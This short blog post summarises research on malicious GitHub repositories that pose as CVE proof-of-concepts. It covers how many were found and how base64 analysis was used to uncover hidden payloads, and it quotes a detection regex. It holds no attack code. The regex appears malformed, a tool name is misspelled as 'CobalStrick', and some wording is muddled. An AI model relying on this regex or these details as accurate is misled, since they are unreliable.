Tuesday, July 2, 2024

GitHub Malicious Compliance for Base64 Benefits

In Beyond the Surface, a timely GitHub malicious repository research paper, it was revealed that repositories are intentionally malicious and publicly uploaded by the repository owner. The researcher studied 47,313 repositories containing malicious files and downloaded GitHub repositories; 4893 were malicious. In some, the attackers were trying to plant malware on users’ machines, while in others, they tried to open backdoors using CobalStrick. This research is particularly relevant in the current cybersecurity landscape.

The researchers have meticulously collected a detailed dataset to analyze all PoCs on GitHub made for specific CVEs by using the GitHub API, which provides keyword-based search capabilities for repositories, code, and commits. They also painstakingly examined the contents, source code, and associated documentation of such repositories to verify whether they contained PoCs for CVE exploits.

In the 21st century, there are many tactics for exploiting vulnerabilities in web applications, OS systems, Network security, etc. Whether a small website or a bigger online platform, all data are connected through programming languages. Cyber attackers exploit up-to-date vulnerabilities to inject malware or attack scripts and shell code. GitHub is not exceptional. They use many repository code templates for programming, website development, etc. The motive of this blog is to write how the researcher analyzes their collected dataset using Base64 analysis.

A table of programming languages used in the repositories shows that Python has emerged as the dominant programming language among hackers and has exploited developers over the past five years.

Base64 analysis: Base64 encoding is another prevalent method for detecting malicious payloads; the researcher extracted base64 values using regular expressions, analyzed them, and decoded hidden scripts to detect any connections with IPs within the encoded payloads. During the analysis, they initially conducted an automated search for base64 payloads using the following regular expression in the PoCs:

([A-Za-z0-9+/]{4}*([A-Za-z0-9+/]{4} |[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{2}==))

No comments:

Post a Comment

Tech@Prism: Identity Clone Attack in Online Social Network

Tech@Prism: Identity Clone Attack in Online Social Network : In recent years, online social network (OSN) services have rapidly become an in...